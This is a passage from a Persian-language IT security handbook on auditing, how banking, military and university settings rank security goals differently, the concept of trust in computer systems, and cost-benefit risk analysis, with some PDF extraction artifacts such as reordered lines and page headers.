‫ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﻭ ﺗـﺎﺯﻩ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﻛـﻪ ﺗﻐﻴﻴـﺮ‬
‫ﻣﻬﻤﻲ ﺭﺥ ﻧﺪﺍﺩﻩ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﻭﺍﻗﻌﹰﺎ ﻫﻴﭻ ﺍﺗﻔﺎﻗﻲ ﻧﻴﺎﻓﺘﺎﺩﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺎﺯﺑﻴﻨﻲ‬
‫ﺑﻪ ﻫﻤﺎﻥ ﻣﻴﺰﺍﻥ ﻛﻪ ﻧﮕﺮﺍﻥ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ‬
‫ﻫﺴﺘﻴﺪ‪ ،‬ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻣﻜـﺎﻥ ﻭﻗـﻮﻉ ﺍﺷـﺘﺒﺎﻫﺎﺕ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺍﻋﻤـﺎﻝ‬
‫ﺑﺪﺧﻮﺍﻫﺎﻧﻪ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺠـﺎﺯ ﻧﻴـﺰ ﺗﻮﺟـﻪ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ‬
‫ﺷﺮﺍﻳﻄﻲ ﺑﺎﻳﺪ ﺁﻧﭽﻪ ﻛﻪ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‪ ،‬ﻓﺮﺩ ﺍﻧﺠﺎﻡﺩﻫﻨﺪﻩ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﺁﻧﺮﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻄﻤﺌﻦ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﺘﺎﻳﺞ‪ ،‬ﺩﺍﺷﺘﻦ ﺳﻮﺍﺑﻖ ﻭ ﺛﺒﺘﻬﺎﻱ ﺗﺨﺮﻳـﺐﻧـﺸﺪﻧﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻓـﺮﺍﺩ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺣـﺴﺎﺱ‪ ،‬ﺷـﻴﻮﺓ ﺑـﺎﺯﺑﻴﻨﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﮔـﺴﺘﺮﺩﻩ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺑﻌـﺪ ﺍﺯ ﺗﻨﻈـﻴﻢ‬
‫ﻭﺿﻌﻴﺖ ﺳﻴﺴﺘﻢ ﺑـﻪ ﻳـﻚ ﺣﺎﻟـﺖ ﺟﺪﻳـﺪ‪ ،‬ﺍﺟـﺎﺯﺓ ﺑﺎﺯﮔـﺸﺖ ﺑـﻪ‬
‫ﻭﺿﻌﻴﺖ ﺍﻭﻟﻴﻪ ﺭﺍ ﻧﻴﺰ ﺑﺪﻫﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻛﻠﻴﺔ ﺍﻳﻦ ﻭﺟﻮﻩ ﺍﻣﻨﻴﺘﻲ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺑﻪ ﻫﺮﻳﻚ ﺑﺎ ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻲﻧﮕﺮﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺧﺘﻼﻑ ﺑﺪﻟﻴﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﻣﻼﺣﻈـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ ﻭ ﺑﺎﻳـﺪ ﺍﻭﻟﻮﻳﺘﻬـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ‬
‫ﺣﺴﺐ ﺁﻥ ﻣﻼﺣﻈﺎﺕ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬
‫ﻣﺤﻴﻂ ﺑﺎﻧﻜﺪﺍﺭﻱ‬
‫ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ‪ ،‬ﻳﻜﭙـﺎﺭﭼﮕﻲ‪ ،‬ﻛﻨﺘـﺮﻝ‪ ،‬ﻭ ﺑـﺎﺯﺑﻴﻨﻲ‪ ،‬ﺍﺯ ﺍﺻـﻮﻝ‬
‫ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ‬
‫ﺩﺭ ﺩﺭﺟﺔ ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻣﺤﻴﻂ ﻧﻈﺎﻣﻲ‬
‫ﺩﺭ ﻳــﻚ ﺳﻴــﺴﺘﻢ ﺩﻓــﺎﻋﻲ ﻣﻠــﻲ ﻛــﻪ ﺣــﺎﻭﻱ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺭ ﺍﻭﻟﻴﻦ ﺩﺭﺟﺔ ﺍﻫﻤﻴـﺖ ﻗـﺮﺍﺭ‬
‫‪١٤٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺭ ﺩﺭﺟﺔ ﺁﺧﺮ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﺤﻴﻄﻬﺎﻱ‬
‫ﺑﺴﻴﺎﺭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣﻘﺎﻣـﺎﺕ ﺭﺳـﻤﻲ ﺗـﺮﺟﻴﺢ‬
‫ﺩﻫﻨﺪ ﻛﻪ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺭﺍ ﻣﻨﻔﺠﺮ ﻛﻨﻨﺪ ﺗﺎ ﺍﺟـﺎﺯﻩ ﻧـﺪﺍﺩﻩ ﺑﺎﺷـﻨﺪ‬
‫ﺍﻃﻼﻋﺖ ﺑﺪﺳﺖ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻴﺎﻓﺘﺪ‪.‬‬
‫ﻣﺤﻴﻂ ﺩﺍﻧﺸﮕﺎﻫﻲ‬
‫ﺩﺭ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑـﻮﺩﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻫﺴﺘﻨﺪ‪ .‬ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ ﺑـﻪ‬
‫ﻣﺮﺍﺗﺐ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺑﺘﻮﺍﻧﻨـﺪ ﺯﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻋﺘﻤﺎﺩ‬
‫ﻻ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﺎ ﻋﻨـﺎﻭﻳﻦ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ‬
‫"ﺍﻣﻦ" ﻭ "ﻧﺎﺍﻣﻦ" ﺧﻄﺎﺏ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜﻪ ﻛﻠﻤﺔ "ﺍﻋﺘﻤـﺎﺩ" ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺗﻮﺿﻴﺢ ﺳﻄﺢ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻖ‬
‫ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﺳﺖ ﺁﻳﺪ‪ .‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﺎ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ‬
‫ﻛــﺎﻓﻲ ﺩﺭ ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻠــﻲ ﻭ ﺗــﻀﻤﻴﻦ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑــﺮﺍﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﻧﺰﺩﻳـﻚ ﺷـﻮﻳﻢ‪ .‬ﺍﻳﺠـﺎﺩ‬
‫ﺍﻋﺘﻤــﺎﺩ ﻛــﺎﻓﻲ ﺩﺭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣــﺴﺘﻠﺰﻡ ﺗﻔﻜــﺮ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺩﻗﻴـﻖ ﺍﺳـﺖ‪ .‬ﺗـﺼﻤﻴﻤﺎﺕ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺍﻣﻜﺎﻥ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺍﺗﺨـﺎﺫ‬
‫ﮔﺮﺩﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻮﺻـﻴﻪﻫـﺎﻱ ﺗﺨﺼـﺼﻲ‬
‫ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪:‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ‪ ،‬ﺩﺍﻧﺸﮕﺎﻩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﺑﺰﺭﮔﺘﺮ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺑﺎ ﺑﺨﺸﻬﺎﻱ ﻣﻤﻴﺰﻱ ﺩﺍﺧﻠـﻲ ﻳـﺎ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺷﺮﻛﺖ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻤﻜﻬﺎﻱ ﻻﺯﻡ ﺍﺭﺗﺒـﺎﻁ‬
‫ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ )ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﺣﻬﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ‬
‫ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻳﺪ(‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺎ ﻣﺮﺍﺟﻌـﻪ ﺑـﻪ‬
‫ﻣﻨﺎﺑﻊ ﻣﻌﺮﻓﻲﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ‪ ،‬ﺩﺭ ﺧﺼﻮﺹ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﻣﻄﺎﻟــﺐ ﺑﻴـﺸﺘﺮﻱ ﺑﻴﺎﻣﻮﺯﻳـﺪ‪ .‬ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺨﻮﺍﻫﻴــﺪ ﺍﺯ ﻳــﻚ‬
‫ﻣﺆﺳﺴﺔ ﻣﺸﺎﻭﺭ ﻃﻠﺐ ﻫﻤﻜﺎﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺷـﺮﻛﺖ ﻛـﻮﭼﻜﺘﺮ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ ﺑﺨﺶ‬
‫ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻧﺒﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷـﻮﺩ ﺑﺨـﺶ‬
‫ﺩﻭﻡ ﻛﺘﺎﺏ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻮﺭ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻴﺶ ﺍﺯ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﺝ ﺷﻤﺎ ﻭﺍﺭﺩ ﺟﺰﺋﻴﺎﺕ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻮﻝ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺗﻨﻈﻴﻢ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﺘﺎﻥ‬
‫ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪.‬‬
‫ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ‪ ،‬ﻓﻬﺮﺳﺘﻲ ﻃﻮﻻﻧﻲ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ‬
‫ﭘﻴﺶ ﺭﻭﻱ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ‪ -‬ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﻳﺪ ﻳﺎ ﺑﺎ ﺗﻤﺎﻡ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠـﻪ ﻛﻨﻴـﺪ‪ .‬ﭼـﻮﻥ ﺯﻣـﺎﻥ ﻭ‬
‫ﭘﻮﻝ ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻛﻨﻮﻥ ﺷـﻤﺎ ﺑـﻪ ﻳـﻚ ﺭﻭﺵ ﺩﺭﺟـﻪﺑﻨـﺪﻱ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺁﺛﺎﺭ ﻭ ﺍﺣﺘﻤﺎﻝ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺑﺰﺍﺭﻫﺎﻱ‬
‫ﻓﻨﻲ ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪ ،‬ﺩﺭ ﻣﻘﺎﺑﻞ ﻛﺪﺍﻣﻬﺎ ﺍﺯ ﺑﻴﻤﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﻭ‬
‫ﻭﻗﻮﻉ ﭼﻪ ﻣﻮﺍﺭﺩﻱ ﺭﺍ ﺻﺮﻓﹰﺎ ﺑﭙﺬﻳﺮﻳﺪ‪ .‬ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺑﺎ ﻛﺪﺍﻡ ﻣﺨﺎﻃﺮﻩ ﺑﺎﻳﺪ ﻣﻘﺎﺑﻠﻪ ﻛـﺮﺩ ﻭ ﻛـﺪﺍﻣﻴﻚ ﺭﺍ‬
‫ﺑﺎﻳــﺪ ﭘــﺬﻳﺮﻓﺖ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻳــﻚ ﺗﺤﻠﻴــﻞ ﺳــﻮﺩ ﻭ ﺯﻳــﺎﻥ ‪-‬‬
‫ﺗﺨﺼﻴﺺ ﻫﺰﻳﻨﻪ ﺑﻪ ﻫﺮ ﺯﻳﺎﻥ ﺍﺣﺘﻤﺎﻟﻲ؛ ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ‬
‫ﺁﻥ‪ ،‬ﺗﻌﻴﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻫﺮ ﻣﺨﺎﻃﺮﻩ‪ ،‬ﻭ ﺳﭙﺲ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ‬
‫ﻫﺰﻳﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺸﺘﺮ ﺍﺳـﺖ ﻳـﺎ ﻧـﻪ ‪-‬‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻋـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺑﻮﺟـﻮﺩ‬
‫ﻼ ﻋﻠﻤﻲ ﻭ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ‬
‫ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻓﺮﺁﻳﻨﺪ ﻛﺎﻣ ﹰ‬
‫ﺑﻴﺎﻳﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﻛﻨﺎﺭ ﻫﻢ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺍﻳـﻦ ﺍﻋـﺪﺍﺩ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ ﻭ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ ﻧﻴﺰ‬
‫ﺗﻨﻬﺎ ﺍﻋـﺪﺍﺩ ﻏﻴﺮﺩﻗﻴـﻖ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺑـﻪ ﺗﻮﺍﻧـﺎﻳﻲ‬
‫ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺯ ﻳﻚ ﺩﺍﺭﺍﺋﻲ‪ ،‬ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ‬
‫ﻣﺨﺎﻃﺮﻩ ﺑﺮﺍﻱ ﺁﻥ ﺩﺍﺭﺍﺋﻲ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻣﺤﺎﺳﺒﻪ ﺗﺄﺛﻴﺮ ﺑﺎﻟﻘﻮﺓ ﻫﺮ ﺍﻧﺘﺨﺎﺏ‬
‫ ﺷﺎﺧﺼﻬﺎﻳﻲ ﻛﻪ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺁﻧﻬـﺎ ﺑـﺴﻴﺎﺭ ﺩﺷـﻮﺍﺭ ﺍﺳـﺖ ‪-‬‬‫ﺑــﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﭼﮕﻮﻧــﻪ ﻣﺨــﺎﻃﺮﺓ ﻳـﻚ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﻪ ﺧﻮﺍﻫــﺪ‬
‫ﺗﻮﺍﻧﺴﺖ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ ﻣﺤﺎﺳﺒﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﮔﺮ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺖ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﻭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﺳﭙﺲ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ‪ .‬ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﺸﺮﻭﺡ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ‬
‫ﻟﺰﻭﻣﹰﺎ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ ﻭ ﻣﻤﻴـﺰﻱ ﺩﺍﺭﺍﻱ ﺗﻴﻤﻬـﺎﻱ ﻣﺘـﺸﻜﻞ ﺍﺯ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻣﻨﻴـﺖ ﻧـﺼﺒﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ‪.‬‬
‫‪١٤٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﻭ ﻛـﺸﻒ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﺟﺪﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪ ،‬ﻳﺎ ﺑﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﻭ ﺍﺻـﻼﺡ ﺁﺳـﻴﺒﻬﺎ‬
‫ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ؟ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺨﻮﺑﻲ ﻣـﻮﺭﺩ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺭﺩ ﺑﺎ ﮔﺬﺷﺖ ﺯﻣﺎﻥ ﺍﻳﻤﻦﺗﺮ ﻣﻲﺷـﻮﺩ ﻳـﺎ ﻧـﺎﺍﻣﻦﺗـﺮ؟ ﻭ ﭼﮕﻮﻧـﻪ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺗﻘﺮﻳﺒﻲ ﻳـﻚ ﻧﻔـﻮﺫ ﻣﻮﻓـﻖ ﺭﺍ ﻣﺤﺎﺳـﺒﻪ ﻣـﻲﻛﻨﻴـﺪ؟‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻣﻄﺎﻟﻌﺎﺕ ﻋﻠﻤﻲ ﻭ ﺁﻣﺎﺭﻱ ﺍﻧﺪﻛﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣـﺴﺎﺋﻞ‬
